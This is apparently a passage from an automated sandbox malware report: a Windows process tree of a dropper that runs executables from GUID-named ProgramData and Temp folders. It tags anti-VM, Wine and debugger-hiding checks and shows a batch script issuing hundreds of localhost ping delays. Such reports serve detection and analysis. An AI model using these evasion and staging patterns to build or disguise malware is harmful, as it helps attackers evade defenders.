- Suspicious use of WriteProcessMemory
PID:3672
- C:\Windows\system32\rundll32.exe
  rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\"
  2⤵
  PID:3132

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\ProgramData\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}
1⤵
PID:2064

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\ProgramData\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}
1⤵
PID:1696

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:232

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 10092 -ip 10092
1⤵
PID:10288

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:12240

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\{3a99b3e1-f3b3-48a4-98d6-9171b7db485b}\35d52f48-8d29-45f4-950d-8adf522167ee.cmd"
1⤵
PID:8408
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:9100
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:10700
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:5216
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:10836
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:10932
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:10984
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:11028
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:11076
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:11236
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:1828
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:11404
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:5316
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:11548
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:11636
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:11428
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:276
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:5824
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:12472
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:12572
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:12612
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:12640
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:12680
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:12748
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:12784
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:12840
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:12876
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:12964
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:13032
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:13124
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:1492
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:5480
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:3148
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:13200
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:13248
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:13504
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:13764
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:13824
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:5992
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:5640
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:5792
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:2160
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:4192
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:4476
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:1908
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:6184
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:6252
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:6296
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:6344
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:6384
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:6468
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:6516
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:6564
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:6616
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:6648
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:6704
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:6764
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:6720
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:6856
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:6896
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:6988
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:7032
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:13956
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:7244
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:7300
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:7448
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:7516
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:7708
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:7760
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:7812
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:7856
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:7916
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:7932
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:8008
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:8052
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:8140
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:8360
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:8616
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:8680
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:8716
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:8812
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:8880
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:9028
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:9072
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:9152
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:5916
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:5200
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:9220
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:9264
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:9308
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:9368
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:9396
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:9452
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:9504
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:9568
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:9620
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:9636
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:9656
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:9736
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:9796
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:9820
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:9888
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:9932
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:9976
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:10028
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:10076
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:10112
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:10164
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:10204
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:3596
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:5284
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:10264
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:10308
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:10368
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:10424
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:10492
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:10632
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:10748
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:10852
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:11052
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:11164
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:11220
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:4692
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:6084
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:11276
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:11332
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:11376
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:11464
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:11572
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:11664
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:11736
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:11796
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:11840
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:11896
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:11928
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:11980
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:12036
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:12080
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:12148
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:12204
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:1764
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:2412
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:6040
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:12344
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:12432
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:12556
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:12916
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:12972
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:13060
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:4380
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:13172
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:13272
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:3920
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:6016
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:3852
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:13320
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:13364
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:13444
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:13524
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:13632
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:13696
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:4268
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:13844
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:3768
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:1804
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Runs ping.exe
  PID:14196
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:14240
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:14304
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:940
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:2076
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:2280
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:14244
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:14288
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:2312
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:4244
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:1544
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:3272
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:5684
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Runs ping.exe
  PID:2008
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:5456
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:1168
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:5844
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:936
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:1020
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:4088
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:3948
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:6180
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:6228
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:6256
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:6316
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:6364
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:6420
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:6472
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:6512
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:4624
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:6604
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:6652
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:6708
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:6760
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:6808
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Runs ping.exe
  PID:6876
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:6944
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:14008
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:2352
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:7020
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:7080
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:7096
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:7132
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:4092
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:1416
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:1548
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:4620
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:3672
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:4424
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:5072
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:2940
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:1752
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:3600
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:7224
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:7284
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:7320
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:7368
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:5228
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:4484
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:7484
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:7536
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:7584
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:7620
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:7664
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:7716
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:7780
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:7884
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:7928
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:7996
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:8120
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:8160
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:1632
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:3764
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:5708
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:2216
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:8208
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:8260
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:8320
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:8364
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:8448
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:8404
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:8556
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:8608
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:8660
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:8752
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:8800
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:3384
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:8936
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:8896
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:8976
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:9036
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:9120
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:9168
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:9172
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:4712
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:2112
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:2296
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:9280
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:9348
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:9336
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:9400
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:9484
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:9460
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:9548
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:9676
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:9740
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:9800
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:9860
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:9916
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:10040
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:10372
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:10788
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:10860
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:2332
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:10884
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:5880
